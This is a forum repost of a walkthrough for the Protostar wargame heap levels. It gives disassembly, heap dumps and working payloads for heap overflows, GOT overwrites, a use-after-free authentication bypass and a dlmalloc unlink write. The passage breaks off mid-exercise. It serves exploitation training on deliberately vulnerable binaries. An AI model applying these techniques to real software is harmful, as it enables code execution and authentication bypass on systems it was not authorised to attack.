Nytro Posted May 25, 2014 Report Posted May 25, 2014 (edited) exploit exercises - protostar - heap levelsExploit Exercises - Protostar wargame includes a number of carefully prepared exercises to help hone your basic exploitation skills. In this walkthrough I will go over the heap exploitation portion of the wargame.Spoiler Alert: I would highly recommend you go over the exercises yourself and come back to this article to find possibly different solutions or in case you get stuck.Table of Contents Heap 0 Heap 1 Heap 2 Improper use of malloc() Solution Stale Pointer Solution (aka Use-After-Free) Heap 3 Heap Layout Heap Binning Heap Unlinking Heap Unlinking Exploitation Virtual Previous Chunk Selecting forward and backward links Virtual Next Chunk(s) Finalizing the exploit External Links and References Special NoteHeap 0The first exercise illustrates a simple heap overflow with a challenge to overwrite a function pointer stored on the heap:0x0804849c <main+16>: call 0x8048388 <malloc@plt> ; d = malloc(64)0x080484a1 <main+21>: mov DWORD PTR [esp+0x18],eax ; store pointer0x080484a5 <main+25>: mov DWORD PTR [esp],0x40x080484ac <main+32>: call 0x8048388 <malloc@plt> ; f = malloc(4)0x080484b1 <main+37>: mov DWORD PTR [esp+0x1c],eax ; store pointer0x080484b5 <main+41>: mov edx,0x80484780x080484ba <main+46>: mov eax,DWORD PTR [esp+0x1c]0x080484be <main+50>: mov DWORD PTR [eax],edx ; f->fp = nowinner() : :0x080484e7 <main+91>: mov eax,DWORD PTR [esp+0x18]0x080484eb <main+95>: mov DWORD PTR [esp+0x4],edx0x080484ef <main+99>: mov DWORD PTR [esp],eax0x080484f2 <main+102>: call 0x8048368 <strcpy@plt> ; overflow d0x080484f7 <main+107>: mov eax,DWORD PTR [esp+0x1c]0x080484fb <main+111>: mov eax,DWORD PTR [eax]0x080484fd <main+113>: call eax ; nowinner()The goal is to execute the function winner() once the call eax instruction is executed:(gdb) p winner$1 = {void (void)} 0x8048464 <winner>The application was nice enough to print addresses returned by the two malloc() calls, saving us the effort of tracking those addresses in the debugger:$ ./heap0 AAAAdata is at 0x804a008, fp is at 0x804a050level has not been passedThe first exploit payload can be completed by calculating the offset to the next heap chunk and inserting the address of the winner() function:$ ./heap0 `python -c 'print "A"*72+"\x64\x84\x04\x08"'`data is at 0x804a008, fp is at 0x804a050level passedHeap 1The next exercise challenges the player to take advantage of several allocated structures to redirect the execution flow. The exercise creates several nested allocations as follows:0x080484c2 <main+9>: mov DWORD PTR [esp],0x8 ; i1 = malloc(8)0x080484c9 <main+16>: call 0x80483bc <malloc@plt>0x080484ce <main+21>: mov DWORD PTR [esp+0x14],eax0x080484d2 <main+25>: mov eax,DWORD PTR [esp+0x14]0x080484d6 <main+29>: mov DWORD PTR [eax],0x1 ; priority = 10x080484dc <main+35>: mov DWORD PTR [esp],0x80x080484e3 <main+42>: call 0x80483bc <malloc@plt> ; name = malloc(8)0x080484e8 <main+47>: mov edx,eax0x080484ea <main+49>: mov eax,DWORD PTR [esp+0x14]0x080484ee <main+53>: mov DWORD PTR [eax+0x4],edx ; i1->name;------------------------------------------------------------------------------0x080484f1 <main+56>: mov DWORD PTR [esp],0x80x080484f8 <main+63>: call 0x80483bc <malloc@plt> ; i2 = malloc(8)0x080484fd <main+68>: mov DWORD PTR [esp+0x18],eax0x08048501 <main+72>: mov eax,DWORD PTR [esp+0x18]0x08048505 <main+76>: mov DWORD PTR [eax],0x2 ; priority = 20x0804850b <main+82>: mov DWORD PTR [esp],0x80x08048512 <main+89>: call 0x80483bc <malloc@plt> ; name = malloc(8)0x08048517 <main+94>: mov edx,eax0x08048519 <main+96>: mov eax,DWORD PTR [esp+0x18]0x0804851d <main+100>: mov DWORD PTR [eax+0x4],edx ; i2->nameTwo strcpy() calls are made in order to populate these structures with user input:0x08048520 <main+103>: mov eax,DWORD PTR [ebp+0xc]0x08048523 <main+106>: add eax,0x40x08048526 <main+109>: mov eax,DWORD PTR [eax]0x08048528 <main+111>: mov edx,eax0x0804852a <main+113>: mov eax,DWORD PTR [esp+0x14]0x0804852e <main+117>: mov eax,DWORD PTR [eax+0x4] ; i1->name0x08048531 <main+120>: mov DWORD PTR [esp+0x4],edx0x08048535 <main+124>: mov DWORD PTR [esp],eax0x08048538 <main+127>: call 0x804838c <strcpy@plt> ; strcpy();------------------------------------------------------------------------------0x0804853d <main+132>: mov eax,DWORD PTR [ebp+0xc]0x08048540 <main+135>: add eax,0x80x08048543 <main+138>: mov eax,DWORD PTR [eax]0x08048545 <main+140>: mov edx,eax0x08048547 <main+142>: mov eax,DWORD PTR [esp+0x18]0x0804854b <main+146>: mov eax,DWORD PTR [eax+0x4]0x0804854e <main+149>: mov DWORD PTR [esp+0x4],edx ; i2->name0x08048552 <main+153>: mov DWORD PTR [esp],eax0x08048555 <main+156>: call 0x804838c <strcpy@plt> ; strcpyThe last piece of code executed is a simple call to puts():0x0804855a <main+161>: mov DWORD PTR [esp],0x804864b0x08048561 <main+168>: call 0x80483cc <puts@plt> ; puts()Let's observe where everything got allocated after user data was already copied:(gdb) break *main+161Breakpoint 1 at 0x804855a: file heap1/heap1.c, line 34.(gdb) r AAAAAAAA BBBBBBBBStarting program: /opt/protostar/bin/heap1 AAAAAAAA BBBBBBBBBreakpoint 1, main (argc=3, argv=0xbffff834) at heap1/heap1.c:34(gdb) x/x $esp+0x14 ; i10xbffff774: 0x0804a008(gdb) x/2x 0x0804a0080x804a008: 0x00000001 0x0804a018(gdb) x/s 0x0804a018 ; i1->name0x804a018: "AAAAAAAA"(gdb) x/x $esp+0x18 ; i20xbffff778: 0x0804a028(gdb) x/2x 0x0804a0280x804a028: 0x00000002 0x0804a038(gdb) x/s 0x0804a038 ; i2->name0x804a038: "BBBBBBBB"An exploit can take advantage of the two writes. The first write can be used to overflow the i1->name member and continue writing until we reach the i2->name in order to populate the pointer with an arbitrary address (e.g. GOT entry for puts()). The second write can be used to fill in the address of the function winner() to complete the challenge.Let's do a bit of recon on memory addresses to overwrite:(gdb) x/i 0x80483cc ; puts()0x80483cc <puts@plt>: jmp DWORD PTR ds:0x8049774(gdb) x/x 0x80497740x8049774 <_GLOBAL_OFFSET_TABLE_+36>: 0x080483d2Finally, the address of winner() can be simply queried in the debugger:(gdb) print winner$1 = {void (void)} 0x8048494 <winner>We can complete the exploit using the above two memory addesses as follows:$ ./heap1 `python -c 'print "A"*20+"\x74\x97\x04\x08"+" "+"\x94\x84\x04\x08"'`and we have a winner @ 1397266680Heap 2Stepping away from code execution, Heap2 exercises requires a bypass of a simple authentication system by corrupting a data structure stored on the heap.Below is the assembly snippet where the flag in the authentication data structure is checked to confirm whether or not the user is logged in using the "login" command:0x08048a86 <main+338>: mov eax,ds:0x804b5f4 ; struct auth *auth0x08048a8b <main+343>: mov eax,DWORD PTR [eax+0x20] ; auth->auth0x08048a8e <main+346>: test eax,eax0x08048a90 <main+348>: je 0x8048aa3 <main+367> ; if(auth->auth) {0x08048a92 <main+350>: mov DWORD PTR [esp],0x804ada7 ; "you have logged in already!"0x08048a99 <main+357>: call 0x804883c <puts@plt> ; }0x08048a9e <main+362>: jmp 0x8048943 <main+15> ; else {0x08048aa3 <main+367>: mov DWORD PTR [esp],0x804adc3 ; "please enter your password"0x08048aaa <main+374>: call 0x804883c <puts@plt> ; }In order for the above check to pass, the auth->auth parameter must be set to a non-zero value.Let's see how the auth struct is initialized using the "auth" command:0x080489a7 <main+115>: mov DWORD PTR [esp],0x40x080489ae <main+122>: call 0x804916a <malloc> ; malloc heap chunk for auth0x080489b3 <main+127>: mov ds:0x804b5f4,eax0x080489b8 <main+132>: mov eax,ds:0x804b5f40x080489bd <main+137>: mov DWORD PTR [esp+0x8],0x4 0x080489c5 <main+145>: mov DWORD PTR [esp+0x4],0x00x080489cd <main+153>: mov DWORD PTR [esp],eax0x080489d0 <main+156>: call 0x80487bc <memset@plt> ; memset auth struct to zero0x080489d5 <main+161>: lea eax,[esp+0x10] ; get 'auth' command line0x080489d9 <main+165>: add eax,0x5 ; offset after "auth "0x080489dc <main+168>: mov DWORD PTR [esp],eax0x080489df <main+171>: call 0x80487fc <strlen@plt> ; get string length0x080489e4 <main+176>: cmp eax,0x1e ; make sure it's <= 30 bytes0x080489e7 <main+179>: ja 0x8048a01 <main+205> 0x080489e9 <main+181>: lea eax,[esp+0x10]0x080489ed <main+185>: lea edx,[eax+0x5]0x080489f0 <main+188>: mov eax,ds:0x804b5f40x080489f5 <main+193>: mov DWORD PTR [esp+0x4],edx0x080489f9 <main+197>: mov DWORD PTR [esp],eax0x080489fc <main+200>: call 0x804880c <strcpy@plt> ; copy to auth->nameThere are several interesting points in the snippet above: malloc() is called with a parameter of 4 bytes which is the size of the *auth pointer and not the size of the struct auth. As a result only enough room for the auth->name will be allocated. The copied string input is explicitly checked to fit in the allocated 4 bytes, so a simple overflow to auth->auth would not work here.Let's explore another accepted command, "service:0x08048a4e <main+282>: lea eax,[esp+0x10]0x08048a52 <main+286>: add eax,0x70x08048a55 <main+289>: mov DWORD PTR [esp],eax0x08048a58 <main+292>: call 0x804886c <strdup@plt> ; duplicate string to heap0x08048a5d <main+297>: mov ds:0x804b5f8,eax ; store address in *serviceThe last piece of functionality in the challenge is the "reset" command which simply calls free() on the auth struct:0x08048a21 <main+237>: mov eax,ds:0x804b5f4 ; *auth0x08048a26 <main+242>: mov DWORD PTR [esp],eax0x08048a29 <main+245>: call 0x804999c <free> ; free()Improper use of malloc() SolutionAt this point we can analyze how heap memory is allocated in order to write the exploit:$ ./heap2[ auth = (nil), service = (nil) ]auth AAAA[ auth = 0x804c008, service = (nil) ]service BBBB[ auth = 0x804c008, service = 0x804c018 ]loginplease enter your password[ auth = 0x804c008, service = 0x804c018 ]Notice that due to the way malloc is called, the next chunk is allocated at 0x804c018. Recall that the application retrieves the pointer to auth->auth at the offset 0x20 relative to the address of auth, in this case the address of auth->auth is 0x804c008 + 0x20 = 0x804c028. As a result of the overlap, if we copy a sufficiently large string (16 bytes or more) using the service command, then the authentication check will pass:$ ./heap2[ auth = (nil), service = (nil) ]auth AAAA[ auth = 0x804c008, service = (nil) ]service BBBBBBBBBBBBBBBB[ auth = 0x804c008, service = 0x804c018 ]loginyou have logged in already![ auth = 0x804c008, service = 0x804c018 ]Stale Pointer Solution (aka Use-After-Free)This exercise likely had a simple typo that prevented the expected stale pointer solution. A use-after-free vulnerability where the deallocated auth chunk is used by the application resulting in authentication bypass.The key to exploiting this condition is being able to be able to overwrite the original chunk with our data. Below is an example of the same chunk being allocated after the call to free():$ ./heap2[ auth = (nil), service = (nil) ]auth AAAA[ auth = 0x804c008, service = (nil) ]reset[ auth = 0x804c008, service = (nil) ]service BBBB[ auth = 0x804c008, service = 0x804c008 ]Notice that the address of service is the same as auth. As a result you could craft a valid auth struct which would pass the authenticated test.Unfortunately, because of the typo strdup() would not be able to reuse the original auth chunk. In the interests of learning I have patched the original binary to allocate the correct 0x24 byte chunk instead as follows:0x080489a7 <main+115>: mov DWORD PTR [esp],0x24 <--- sizeof(struct auth)0x080489ae <main+122>: call 0x804916a <malloc>0x080489b3 <main+127>: mov ds:0x804b5f4,eax0x080489b8 <main+132>: mov eax,ds:0x804b5f40x080489bd <main+137>: mov DWORD PTR [esp+0x8],0x24 <--- sizeof(struct auth)0x080489c5 <main+145>: mov DWORD PTR [esp+0x4],0x00x080489cd <main+153>: mov DWORD PTR [esp],eax0x080489d0 <main+156>: call 0x80487bc <memset@plt>We can now exploit this vulnerability the way it was intended:$ ./heap2[ auth = (nil), service = (nil) ]auth AAAA[ auth = 0x804c008, service = (nil) ]reset[ auth = 0x804c008, service = (nil) ]service AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[ auth = 0x804c008, service = 0x804c008 ]loginyou have logged in already![ auth = 0x804c008, service = 0x804c008 ]Heap 3The last exercise in the heap series introduces the exploitation of the classic Doug Lea Malloc. For the sake of learning, this walkthrough will go in-depth on every aspect of the exploitation process, so feel free to skip ahead if it gets too dense.Heap LayoutThe key to writing an exploit for this exercise is visualizing the layout of chunks in memory and how they can be corrupted.For example, here is how an allocated chunk looks like: chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Size of previous chunk, if allocated | | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Size of chunk, in bytes |M|P| mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | User data starts here... . . . . (malloc_usable_size() bytes) . . |nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Size of chunk | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+The exercise allocates three 32 byte chunks as follows:0x08048892 <main+9>: mov DWORD PTR [esp],0x200x08048899 <main+16>: call 0x8048ff2 <malloc> ; a = malloc(32)0x0804889e <main+21>: mov DWORD PTR [esp+0x14],eax0x080488a2 <main+25>: mov DWORD PTR [esp],0x200x080488a9 <main+32>: call 0x8048ff2 <malloc> ; b = malloc(32)0x080488ae <main+37>: mov DWORD PTR [esp+0x18],eax0x080488b2 <main+41>: mov DWORD PTR [esp],0x200x080488b9 <main+48>: call 0x8048ff2 <malloc> ; c = malloc(32)0x080488be <main+53>: mov DWORD PTR [esp+0x1c],eax0x080488c2 <main+57>: mov eax,DWORD PTR [ebp+0xc]Breaking the application immediately after all three malloc() calls, we can observe the heap memory layout:(gdb) break *main+60(gdb) r AAAA BBBB CCCCStarting program: /opt/protostar/bin/heap3 AAAA BBBB CCCCBreakpoint 1, 0x080488c5 in main (argc=4, argv=0xbffff844) at heap3/heap3.c:20(gdb) x/3x $esp+0x140xbffff784: 0x0804c008 0x0804c030 0x0804c058 +----- size of chunk(gdb) x/12x 0x0804c008 - 8 |0x804c000: 0x00000000 0x00000029 0x00000000 0x000000000x804c010: 0x00000000 0x00000000 0x00000000 0x000000000x804c020: 0x00000000 0x00000000 0x00000000 0x00000029 | size of next chunk ----+(gdb) x/12x 0x0804c030 - 80x804c028: 0x00000000 0x00000029 0x00000000 0x000000000x804c038: 0x00000000 0x00000000 0x00000000 0x000000000x804c048: 0x00000000 0x00000000 0x00000000 0x00000029(gdb) x/12x 0x0804c058 - 80x804c050: 0x00000000 0x00000029 0x00000000 0x000000000x804c060: 0x00000000 0x00000000 0x00000000 0x000000000x804c070: 0x00000000 0x00000000 0x00000000 0x00000f89Notice that the chunk size 0x29 includes IS_MMAPPED and PREV_INUSE flags as its two least significant bits, so the true size is 0x29 & 0xfc = 0x28 or 40 bytes. This value corresponds to the originally requested 32 bytes + 8 bytes for the header.After the three strcpy() operations, all of the application's memory chunks get populated with their respective command line parameter:(gdb) break *main+136Breakpoint 2 at 0x8048911: file heap3/heap3.c, line 24.(gdb) cBreakpoint 2, 0x08048911 in main (argc=4, argv=0xbffff844) at heap3/heap3.c:24(gdb) x/12x 0x0804c008 - 80x804c000: 0x00000000 0x00000029 0x41414141 0x000000000x804c010: 0x00000000 0x00000000 0x00000000 0x000000000x804c020: 0x00000000 0x00000000 0x00000000 0x00000029(gdb) x/12x 0x0804c030 - 80x804c028: 0x00000000 0x00000029 0x42424242 0x000000000x804c038: 0x00000000 0x00000000 0x00000000 0x000000000x804c048: 0x00000000 0x00000000 0x00000000 0x00000029(gdb) x/12x 0x0804c058 - 80x804c050: 0x00000000 0x00000029 0x43434343 0x000000000x804c060: 0x00000000 0x00000000 0x00000000 0x000000000x804c070: 0x00000000 0x00000000 0x00000000 0x00000f89At last the program concludes with three consecutive free() calls which deallocate chunks in reverse order:0x0804890a <main+129>: mov eax,DWORD PTR [esp+0x1c]0x0804890e <main+133>: mov DWORD PTR [esp],eax0x08048911 <main+136>: call 0x8049824 <free> ; free(c)0x08048916 <main+141>: mov eax,DWORD PTR [esp+0x18]0x0804891a <main+145>: mov DWORD PTR [esp],eax0x0804891d <main+148>: call 0x8049824 <free> ; free(0x08048922 <main+153>: mov eax,DWORD PTR [esp+0x14]0x08048926 <main+157>: mov DWORD PTR [esp],eax0x08048929 <main+160>: call 0x8049824 <free> ; free(a)At this point, it is clear that it is easy to overflow all three chunks; however, the exact mechanism to gain code execution will require some work.Heap BinningFirst let's observe what happens to memory after the three free() calls execute.(gdb) break *main+165Breakpoint 3 at 0x804892e: file heap3/heap3.c, line 28.(gdb) cBreakpoint 3, main (argc=4, argv=0xbffff844) at heap3/heap3.c:28 chunk size ----+ +---- forward pointer | |(gdb) x/12x 0x0804c008 - 8 | | 0x804c000: 0x00000000 0x00000029 0x0804c028 0x000000000x804c010: 0x00000000 0x00000000 0x00000000 0x000000000x804c020: 0x00000000 0x00000000 0x00000000 0x00000029(gdb) x/12x 0x0804c030 - 80x804c028: 0x00000000 0x00000029 0x0804c050 0x000000000x804c038: 0x00000000 0x00000000 0x00000000 0x000000000x804c048: 0x00000000 0x00000000 0x00000000 0x00000029(gdb) x/12x 0x0804c058 - 80x804c050: 0x00000000 0x00000029 0x00000000 0x000000000x804c060: 0x00000000 0x00000000 0x00000000 0x000000000x804c070: 0x00000000 0x00000000 0x00000000 0x00000f89It looks like a single linked data structure with forward pointers containing addresses of the next free chunk. Let's look at the disassembly of the free() function to understand what it is doing:0x804982a <free+6>: mov DWORD PTR [ebp-0x38],0x804b160 ; bin0x8049831 <free+13>: cmp DWORD PTR [ebp+0x8],0x0 ; make sure mem != 00x8049835 <free+17>: je 0x8049a89 <free+613>;------------------------------------------------------------------------------0x804983b <free+23>: mov eax,DWORD PTR [ebp+0x8] ; mem to free0x804983e <free+26>: sub eax,0x8 ; chunk = mem - 8;0x8049841 <free+29>: mov DWORD PTR [ebp-0x34],eax ; store chunk0x8049844 <free+32>: mov eax,DWORD PTR [ebp-0x34]0x8049847 <free+35>: mov eax,DWORD PTR [eax+0x4] ; chunk_size_flags0x804984a <free+38>: and eax,0xfffffffc ; zero last two flag bits0x804984d <free+41>: mov DWORD PTR [ebp-0x30],eax ; chunk_size0x8049850 <free+44>: mov eax,DWORD PTR [ebp-0x38] ; bin0x8049853 <free+47>: mov eax,DWORD PTR [eax] ; max bin chunk size (0x49)0x8049855 <free+49>: cmp eax,DWORD PTR [ebp-0x30] ; compare to chunk_size0x8049858 <free+52>: jb 0x8049899 <free+117> ; unsigned comparison;------------------------------------------------------------------------------0x804985a <free+54>: mov eax,DWORD PTR [ebp-0x38] ; bin0x804985d <free+57>: mov eax,DWORD PTR [eax] ; bin size threshold0x804985f <free+59>: mov edx,eax0x8049861 <free+61>: and edx,0xfffffffe ; zero out the last bit0x8049864 <free+64>: mov eax,DWORD PTR [ebp-0x38]0x8049867 <free+67>: mov DWORD PTR [eax],edx ; update bin size0x8049869 <free+69>: mov eax,DWORD PTR [ebp-0x38];------------------------------------------------------------------------------0x804986c <free+72>: lea edx,[eax+0x4] ; bin base (0x804b164)0x804986f <free+75>: mov eax,DWORD PTR [ebp-0x30] ; chunk_size0x8049872 <free+78>: shr eax,0x3 ; calculate bin offset0x8049875 <free+81>: sub eax,0x2 ; based on chunk size.0x8049878 <free+84>: shl eax,0x2 ; (( 0x28/8 )- 2 )* 4 = 0xc0x804987b <free+87>: lea eax,[edx+eax*1] ; bin base + 0xc;------------------------------------------------------------------------------0x804987e <free+90>: mov DWORD PTR [ebp-0x2c],eax ; bin base for size 0x400x8049881 <free+93>: mov eax,DWORD PTR [ebp-0x2c]0x8049884 <free+96>: mov edx,DWORD PTR [eax] ; bin head0x8049886 <free+98>: mov eax,DWORD PTR [ebp-0x34] ; chunk0x8049889 <free+101>: mov DWORD PTR [eax+0x8],edx ; set chunk->fd to bin head0x804988c <free+104>: mov eax,DWORD PTR [ebp-0x2c] ;0x804988f <free+107>: mov edx,DWORD PTR [ebp-0x34]0x8049892 <free+110>: mov DWORD PTR [eax],edx ; bin head = chunk0x8049894 <free+112>: jmp 0x8049a89 <free+613> :0x8049a89 <free+613>: leaveStudying the above disassembly, you can see that freed chunks smaller than 64 bytes are placed into a single-linked list. The list itself is placed at a calculated location in a bin data structure. All this extra infrastructure offers increased performance and reduced fragmentation when dealing with small (<64 bytes) chunks. Imagine if you need to allocate another 32 byte chunk. The allocator would quickly check the appropriate bin that has a linked list of free 32 byte chunks and provide you with the address to use.After the completion of all three frees, the 40 byte chunk bin will contain the address of the original Chunk A:(gdb) x/x 0x804b1700x804b170 <av_+16>: 0x0804c000Now as educational as it was to study how malloc bins work the actual exploitation would require at least one more allocation. With a hypothetical allocation, we could provide an overflown forward pointer which may allow us to corrupt memory once the allocator attempts to relink the chain. Unfortunately, this scenario is not applicable in this case so we must seek an alternative path.Heap UnlinkingLooking at the code path that malloc took in the previous section, we can see that a huge chunk of code was skipped because the chunk size was < 64 bytes:0x8049853 <free+47>: mov eax,DWORD PTR [eax] ; max bin chunk size (0x49)0x8049855 <free+49>: cmp eax,DWORD PTR [ebp-0x30] ; compare to chunk_size0x8049858 <free+52>: jb 0x8049899 <free+117> ; unsigned comparisonLet's reverse engineer the code flow in case the jump did take place (for chunks larger than 64 bytes):0x8049899 <free+117>: mov eax,DWORD PTR [ebp-0x34] ; chunk0x804989c <free+120>: mov eax,DWORD PTR [eax+0x4] ; chunk_size_flags0x804989f <free+123>: and eax,0x2 ; IS_MMAPPED0x80498a2 <free+126>: test eax,eax ; check flag0x80498a4 <free+128>: jne 0x8049a2c <free+520> ; jump if the flag is set;------------------------------------------------------------------------------0x80498aa <free+134>: mov eax,DWORD PTR [ebp-0x30] ; chunk_size0x80498ad <free+137>: mov edx,DWORD PTR [ebp-0x34] ; chunk0x80498b0 <free+140>: lea eax,[edx+eax*1] ; next_chunk0x80498b3 <free+143>: mov DWORD PTR [ebp-0x28],eax ; store next_chunk0x80498b6 <free+146>: mov eax,DWORD PTR [ebp-0x28]0x80498b9 <free+149>: mov eax,DWORD PTR [eax+0x4] ; next_chunk_size_flags0x80498bc <free+152>: and eax,0xfffffffc ; zero last two flag bits0x80498bf <free+155>: mov DWORD PTR [ebp-0x24],eax ; next_chunk_size;------------------------------------------------------------------------------0x80498c2 <free+158>: mov eax,DWORD PTR [ebp-0x34] ; chunk0x80498c5 <free+161>: mov eax,DWORD PTR [eax+0x4] ; chunk_size0x80498c8 <free+164>: and eax,0x1 ; PREV_INUSE flag0x80498cb <free+167>: test eax,eax ; check the flag0x80498cd <free+169>: jne 0x8049909 <free+229> ; jump if the flag is setPretty boring so far. A check is done to see whether the two least significant bits are set in the chunk size and jump way down if that's the case. As previously mentioned, the two bits correspond to IS_MMAPPED and PREV_INUSE flags. Recall that the size field of our three chunks was set to 0x29 meaning that the least significant bits were indeed set (PREV_INUSE). So even if we somehow made a chunk appear larger than 64 bytes, we would still have jump to <free+229>.Imagine that there is a way to bypass both of these jumps and continue executing as if neither of the two flags were set:0x80498cf <free+171>: mov eax,DWORD PTR [ebp-0x34] ; chunk0x80498d2 <free+174>: mov eax,DWORD PTR [eax] ; prev_chunk_size0x80498d4 <free+176>: mov DWORD PTR [ebp-0x1c],eax0x80498d7 <free+179>: mov eax,DWORD PTR [ebp-0x1c]0x80498da <free+182>: add DWORD PTR [ebp-0x30],eax ; chunk_size0x80498dd <free+185>: mov eax,DWORD PTR [ebp-0x1c]0x80498e0 <free+188>: neg eax ; -prev_chunk_size0x80498e2 <free+190>: add DWORD PTR [ebp-0x34],eax ; prev_chunk = ; chunk+(-prev_chunk_size)0x80498e5 <free+193>: mov eax,DWORD PTR [ebp-0x34] ; store prev_chunk0x80498e8 <free+196>: mov eax,DWORD PTR [eax+0x8] ; prev_chunk->fd0x80498eb <free+199>: mov DWORD PTR [ebp-0x14],eax 0x80498ee <free+202>: mov eax,DWORD PTR [ebp-0x34]0x80498f1 <free+205>: mov eax,DWORD PTR [eax+0xc] ; prev_chunk->bk0x80498f4 <free+208>: mov DWORD PTR [ebp-0x18],eax0x80498f7 <free+211>: mov eax,DWORD PTR [ebp-0x14] ; FD0x80498fa <free+214>: mov edx,DWORD PTR [ebp-0x18] ; BK0x80498fd <free+217>: mov DWORD PTR [eax+0xc],edx ; FD->bk = BK0x8049900 <free+220>: mov eax,DWORD PTR [ebp-0x18] ; BK0x8049903 <free+223>: mov edx,DWORD PTR [ebp-0x14] ; FD0x8049906 <free+226>: mov DWORD PTR [eax+0x8],edx ; BK->fk = FDNow it's getting exciting, allow me to explain why =). Toward the bottom of the disassembly there are two memory writes that perform chunk unlinking as part of backward chunk consolidation. Both of the memory writes use source and destination addresses stored in the chunk headers, specifically chunk forward and backward pointers. Recall that we can overflow chunks at will with the three gets() calls and as a result we may be able to control the addresses used above to make an arbitrary write.Heap Unlinking ExploitationIn order to reach the "interesting" code block at <free+211> we must be able to create a chunk with the size satisfying the following parameters: Must be greater than 64 (unsigned comparison) Last two bits must be set to 0The following payload can overwrite the adjacent chunk's size parameter to satisfy these requirements:(gdb) r AAAA `python -c 'print "B"*32 + "CCCC" + "\xf0"'` CCCCIt is useful to visualize heap chunks in memory: /------ Chunk A -------\ /------ Chunk B -------\ /------ Chunk C -------\+----+----+--------------+----+----+--------------+----+----+--------------+| | | AAAA | | | BBBB... BBBB|CCCC|\xf0| CCCC |+----+----+--------------+----+----+--------------+----+----+--------------+ | | previous chunk size --+ +-- chunk sizeChunk B was overflown into Chunk C to replace previous size value with 0x43434343 and the actual chunk size with \xf0. The value \xf0 can be replaced with any other value subject to the aforementioned conditions. Once free© is called, the jump at <free+52> would no longer take place and we would start executing the "interesting" branch.Virtual Previous ChunkNext we need to direct the code to use the fake forward and backward pointers from the user controlled memory area. Thus we need to create a virtual chunk that replicates the following free chunk structure: chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Size of previous chunk | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ `head:' | Size of chunk, in bytes |M|P| mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Forward pointer to next chunk in list | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Back pointer to previous chunk in list | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Unused space (may be 0 bytes long) . . . . |nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ `foot:' | Size of chunk, in bytes | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+Recall from the disassembly above that the forward and backward pointers are taken from a previous chunk. The location of the previous chunk is calculated by subtracting the size of the previous chunk from the current chunk's pointer. Ideally, if we could write the value 0x20 (32), then the previous chunk would have been calculated exactly into the Chunk B which contains the two fake forward and backward pointers. Unfortunately there is no way to do this without introducing null bytes and terminating the string before overwriting the Chunk C's size. If we can't move backward, then we can certainly move forward using a negative value: previous chunk size (-4) --+ +-- chunk size (\xf0) | |(gdb) r AAAA `python -c 'print "B"*32 + "\xfc\xff\xff\xff" + "\xf0"'` CCCCDDDDEEEE | | fd --+ | | bk --+Program received signal SIGSEGV, Segmentation fault.0x080498fd in free (mem=0x804c058) at common/malloc.c:3638(gdb) x/i $eip0x80498fd <free+217>: mov DWORD PTR [eax+0xc],edx(gdb) i r eax edxeax 0x44444444 1145324612edx 0x45454545 1162167621Using a negative value for the previous chunk size forces the previous chunk to be calculated after the current chunk while avoiding null bytes. The value -4 was seleted for the sake of keeping everything dword aligned. Once the free() gets executed it segfaults trying to write to 0x44444444 + 0xc with the value 0x45454545. This was an expected behavior when trying to unlink the virtual chunk illustrated below: /------ Chunk A -------\ /------ Chunk B -------\ /------ Chunk C -------------\+----+----+--------------+----+----+--------------+----+----+--------------------+| | | AAAA | | | BBBB... BBBB| -4|\xf0| CCCCDDDDEEEE |+----+----+--------------+----+----+--------------+----+----+--------------------+ : : :/---- Virtual Chunk ----\: +----+----+----+----+-----+ |\xf0|CCCC|DDDD|EEEE| ... | +----+----+----+----+-----+ | | fd --+ +-- bkSelecting forward and backward linksAt this point we need to decide which source and destination addresses to use in-place of the forward and backward links. The goal of the exercise is to execute the hidden winner() function:(gdb) info address winnerSymbol "winner" is a function at address 0x8048864.In order to call this function we could overwrite the GOT entry for the puts() call which is used at the very end of the main() function:0x0804892e <main+165>: mov DWORD PTR [esp],0x804ac270x08048935 <main+172>: call 0x8048790 <puts@plt>0x0804893a <main+177>: leave0x0804893b <main+178>: retSpecifically, we need to overwrite the following address:$ objdump -R heap3 | grep puts0804b128 R_386_JUMP_SLOT putsIdeally, if we could set 0x804b128 - 0xc = 0x804b11c (to compensate for mov DWORD PTR [eax+0xc],edx) as the destination address and write the value 0x8048864, then we could gain the desired execution flow. Let's try it out:(gdb) r AAAA `python -c 'print "B"*32 + "\xfc\xff\xff\xff" + "\xf0"'` `python -c 'print "CCCC"+"\x1c\xb1\x04\x08"+"\x64\x88\x04\x08"'`Program received signal SIGSEGV, Segmentation fault.0x08049906 in free (mem=0x804c058) at common/malloc.c:3638Oops, looks like we failed to write something; however, since the error occurs further down the copy operation let's see if it actually succeeded:(gdb) x/x 0x804b1280x804b128 <_GLOBAL_OFFSET_TABLE_+64>: 0x08048864Great, the GOT entry for puts() was overwritten with the address of winner(). Now let's investigate what caused the crash and whether we could go around it:(gdb) x/4i $eip - 90x80498fd <free+217>: mov DWORD PTR [eax+0xc],edx <-- succeeded0x8049900 <free+220>: mov eax,DWORD PTR [ebp-0x18]0x8049903 <free+223>: mov 